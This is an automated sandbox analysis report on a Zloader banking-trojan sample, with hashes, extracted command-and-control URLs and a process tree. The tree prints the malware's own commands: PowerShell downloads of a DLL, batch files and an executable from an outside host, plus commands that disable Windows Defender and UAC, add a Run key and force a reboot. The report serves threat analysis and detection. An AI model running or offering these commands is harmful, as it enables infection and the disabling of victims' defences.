zloader | 197473ef9099e43c74fc5dd19776cb4e001ccd39102c38c3bfa3f81db9fd92bb

Analysis

max time kernel
82s
max time network
151s
platform
windows10_x64
resource
win10v20210410
submitted
15-08-2021 11:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

397eb08dc1794600fdd0c4744c2aeb12.exe
Size

165KB
MD5

397eb08dc1794600fdd0c4744c2aeb12
SHA1

5e7b7419c58ed1322917144efaa1b6ba87086b67
SHA256

197473ef9099e43c74fc5dd19776cb4e001ccd39102c38c3bfa3f81db9fd92bb
SHA512

669b705f38b7614e14957368048c590a82673c52c8281d3bd0c3d4d77f398d4f65fbbccc3a1e284579149432e26942e3b52df8876d83267f0ac4fc8974b94e69

Score

10^/10

zloader vasja vasja botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1672 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1280 regsvr32.exe

flow	pid	process
7	1672	powershell.exe

pid	process
1280	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

397eb08dc1794600fdd0c4744c2aeb12.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	397eb08dc1794600fdd0c4744c2aeb12.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	397eb08dc1794600fdd0c4744c2aeb12.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1672 powershell.exe
1672 powershell.exe
1672 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1672 powershell.exe

pid	process
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1672	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

397eb08dc1794600fdd0c4744c2aeb12.execmd.exeregsvr32.exe

description	pid	process	target process
PID 3908 wrote to memory of 504	3908	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 3908 wrote to memory of 504	3908	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 504 wrote to memory of 1672	504	cmd.exe	powershell.exe
PID 504 wrote to memory of 1672	504	cmd.exe	powershell.exe
PID 504 wrote to memory of 3372	504	cmd.exe	regsvr32.exe
PID 504 wrote to memory of 3372	504	cmd.exe	regsvr32.exe
PID 3372 wrote to memory of 1280	3372	regsvr32.exe	regsvr32.exe
PID 3372 wrote to memory of 1280	3372	regsvr32.exe	regsvr32.exe
PID 3372 wrote to memory of 1280	3372	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\397eb08dc1794600fdd0c4744c2aeb12.exe
"C:\Users\Admin\AppData\Local\Temp\397eb08dc1794600fdd0c4744c2aeb12.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaN.dll -OutFile JavaN.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\system32\regsvr32.exe
regsvr32 JavaN.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\SysWOW64\regsvr32.exe
JavaN.dll
4⤵
- Loads dropped DLL
PID:1280

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:2748

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:3400

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:2844

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:2328

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:3416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:1668

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:1012

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:2316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f1525085488039125c164eb6a61aae55

SHA1
441e0577e0aa83febc1f9f16be607ed9cb91299c

SHA256
c5e420af2df78d89657655a4209cb50354c198789c286b80b268672bfb12cffd

SHA512
866a4ec4e419bf7eecd64632a92d0c887a546a6110cea7e1e9f76d5e5830847abe10928e6e692b0a20474ababc7140ef4b65ba6e0c1675717d75e0c8f57492c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
942cafad0497e5237ee07d29cf462cd7

SHA1
7a4c8df03c7f961a63062d66e34fe4cb23774f6a

SHA256
6100a7191020d5d6b714098655428215977de34013a5323fdb569b6940272570

SHA512
d5825aa2d19c8b62bc3f3a68c9a145d22c307008118548d126b4d5373b4144b12ba498af29c82a08855207e366cffb95608db3266e119cfdb3eac61319bbe270

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cdb5d29c4b6c3e908e9655999616a3c8

SHA1
4633c29c747872f4becd321f2903cc5c63473e6e

SHA256
9f20712aa4898562f3eeae17e09e6d1f56b53ae17df0415c2357a287951dccf4

SHA512
14103e9bf3782729e82f9ec47692a50e8354d095d4f4f1a9eb29727edea985f8ae2a8e26dff44ade56299f4a36ed1c8f84b102253f136b7c4ed955107b68f140

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
211b9753c0f84152ca2d5c4a30db57b0

SHA1
c00e3513dd610fee7e585740ff3453cd72564391

SHA256
17c1f47d61e444a89263be78d7c3fba82df7a464001eb20aa46a32a2a121b07d

SHA512
b360130d64346dd299c7dd9a27f0bd11e6f9d8c77bc1a7dc7affb6f2c80aa23f151aede99f74c27bfe32aa4359389729d6f5b14bde3ab80cd4d3a04d2d2b6c25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
75b8aaca8695d47401b74b766ada8711

SHA1
ee8d39bcb679ba657c0f0b33280d57dab56b760a

SHA256
cdf3beadbe42a2fa36463335206acd7c33adb591c8f2316fe885c6f8765109c8

SHA512
2621fde7fd5a748330fea8d77378d510fd4d38391136a6d45ae9413fbe38a53481ab73e1e150e8c523454d0f470a4260343c66c179925ee73a0860ae47a030d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
e19a61e9b27aaa153d4349fd3ae1eab7

SHA1
40270d03db738df8e1ada6d4af83758e13b16a5f

SHA256
548734b528695841401ad73a76496355483ff5c51967a846cb4d6e51e04f03fc

SHA512
7ad1f90497ced0f288d846ef4d37aca98df54ae0fd5501be60bd691f8cb40cd752f652e9d1785cf26865266533207e5a4cd6dd339ce6f6d564c4557f965790c6

Download Submit
C:\Users\Admin\AppData\Roaming\JavaN.dll
MD5
40935d0671be0444d3c5271b56734e58

SHA1
a034003808a14db6a181d2965375c65141459b56

SHA256
cf957ff480387afbdd378623d8f212440cfee360bc862eff39c4703225e4b8f8

SHA512
449a12fabce95fc7aa9bd7029dc69b1b21e74fbb81d152350696440d928fd4df060fe07a8dd1c34e6a5561045105597939471c4dd5f136bdfab3a025b91cec51

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
6f10d512d4cbb527fd26ae266d0a4aef

SHA1
6e42d51ff2d42c5f999943b329a655e901ea4b32

SHA256
b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943

SHA512
4f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e

Download Submit
\Users\Admin\AppData\Roaming\JavaN.dll
MD5
40935d0671be0444d3c5271b56734e58

SHA1
a034003808a14db6a181d2965375c65141459b56

SHA256
cf957ff480387afbdd378623d8f212440cfee360bc862eff39c4703225e4b8f8

SHA512
449a12fabce95fc7aa9bd7029dc69b1b21e74fbb81d152350696440d928fd4df060fe07a8dd1c34e6a5561045105597939471c4dd5f136bdfab3a025b91cec51

Download Submit
memory/504-114-0x0000000000000000-mapping.dmp

Download
memory/516-247-0x0000011FAC406000-0x0000011FAC408000-memory.dmp

Filesize
8KB

Download
memory/516-218-0x0000000000000000-mapping.dmp

Download
memory/516-229-0x0000011FAC403000-0x0000011FAC405000-memory.dmp

Filesize
8KB

Download
memory/516-228-0x0000011FAC400000-0x0000011FAC402000-memory.dmp

Filesize
8KB

Download
memory/1012-276-0x0000000000000000-mapping.dmp

Download
memory/1280-141-0x0000000000930000-0x00000000009DE000-memory.dmp

Filesize
696KB

Download
memory/1280-142-0x0000000010000000-0x0000000010121000-memory.dmp

Filesize
1.1MB

Download
memory/1280-139-0x0000000000000000-mapping.dmp

Download
memory/1460-143-0x0000000000000000-mapping.dmp

Download
memory/1460-155-0x0000000000130000-0x0000000000156000-memory.dmp

Filesize
152KB

Download
memory/1668-249-0x0000022967E63000-0x0000022967E65000-memory.dmp

Filesize
8KB

Download
memory/1668-248-0x0000022967E60000-0x0000022967E62000-memory.dmp

Filesize
8KB

Download
memory/1668-235-0x0000000000000000-mapping.dmp

Download
memory/1668-270-0x0000022967E66000-0x0000022967E68000-memory.dmp

Filesize
8KB

Download
memory/1668-277-0x0000022967E68000-0x0000022967E69000-memory.dmp

Filesize
4KB

Download
memory/1672-130-0x0000025325BE0000-0x0000025325BE2000-memory.dmp

Filesize
8KB

Download
memory/1672-132-0x0000025325BE6000-0x0000025325BE8000-memory.dmp

Filesize
8KB

Download
memory/1672-131-0x0000025325BE3000-0x0000025325BE5000-memory.dmp

Filesize
8KB

Download
memory/1672-125-0x0000025325CF0000-0x0000025325CF1000-memory.dmp

Filesize
4KB

Download
memory/1672-121-0x0000025325B30000-0x0000025325B31000-memory.dmp

Filesize
4KB

Download
memory/1672-116-0x0000000000000000-mapping.dmp

Download
memory/2328-193-0x0000000000000000-mapping.dmp

Download
memory/2748-146-0x0000000000000000-mapping.dmp

Download
memory/2748-157-0x0000020C4ACD0000-0x0000020C4ACD2000-memory.dmp

Filesize
8KB

Download
memory/2748-158-0x0000020C4ACD3000-0x0000020C4ACD5000-memory.dmp

Filesize
8KB

Download
memory/2748-164-0x0000020C4ACD6000-0x0000020C4ACD8000-memory.dmp

Filesize
8KB

Download
memory/2844-172-0x0000000000000000-mapping.dmp

Download
memory/2844-191-0x000001E957F66000-0x000001E957F68000-memory.dmp

Filesize
8KB

Download
memory/2844-183-0x000001E957F63000-0x000001E957F65000-memory.dmp

Filesize
8KB

Download
memory/2844-182-0x000001E957F60000-0x000001E957F62000-memory.dmp

Filesize
8KB

Download
memory/3372-137-0x0000000000000000-mapping.dmp

Download
memory/3400-169-0x0000000000000000-mapping.dmp

Download
memory/3416-213-0x00000277EED56000-0x00000277EED58000-memory.dmp

Filesize
8KB

Download
memory/3416-207-0x00000277EED53000-0x00000277EED55000-memory.dmp

Filesize
8KB

Download
memory/3416-206-0x00000277EED50000-0x00000277EED52000-memory.dmp

Filesize
8KB

Download
memory/3416-197-0x0000000000000000-mapping.dmp

Download
memory/3476-195-0x0000000000000000-mapping.dmp

Download
memory/4040-171-0x0000000000000000-mapping.dmp

Download